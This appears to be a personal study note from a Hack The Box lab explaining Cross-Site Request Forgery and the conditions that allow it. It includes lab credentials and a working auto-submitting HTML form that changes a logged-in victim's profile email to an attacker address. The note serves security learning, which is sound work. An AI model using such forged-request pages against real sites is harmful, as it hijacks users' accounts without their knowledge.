Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) forces an authenticated user to execute unintended actions on a web application through attacker-crafted web pages. These requests inherit the victim’s identity and privileges.

Vulnerability Conditions

A web application is vulnerable to CSRF when:

All required request parameters can be determined or guessed by the attacker
Session management relies solely on HTTP cookies (automatically included in browser requests)

Requirements for Exploitation

Craft a malicious web page that issues a valid cross-site request impersonating the victim
Victim must be logged into the application when the malicious request is issued

CSRF Example

Login: crazygorilla983 / pisces at http://xss.htb.net

Using Burp Suite (Intercept On), clicking “Save” reveals a POST request to /api/update-profile with no anti-CSRF token.

Create malicious HTML page (notmalicious.html):

<html>
  <body>
    <form id="submitMe" action="<http://xss.htb.net/api/update-profile>" method="POST">
      <input type="hidden" name="email" value="attacker@htb.net" />
      <input type="hidden" name="telephone" value="&#40;227&#41;&#45;750&#45;8112" />
      <input type="hidden" name="country" value="CSRF_POC" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.getElementById("submitMe").submit()
    </script>
  </body>
</html>

Serve the page:

python -m http.server 1337

While still logged in as Ela Stienen, visit http://<VPN/TUN Adapter IP>:1337/notmalicious.html. The profile details change to the attacker-specified values, confirming the CSRF vulnerability.

LogJam🪵

Explorer

Cross-Site Request Forgery (CSRF)

Vulnerability Conditions

Requirements for Exploitation

CSRF Example

Graph View

Table of Contents

Backlinks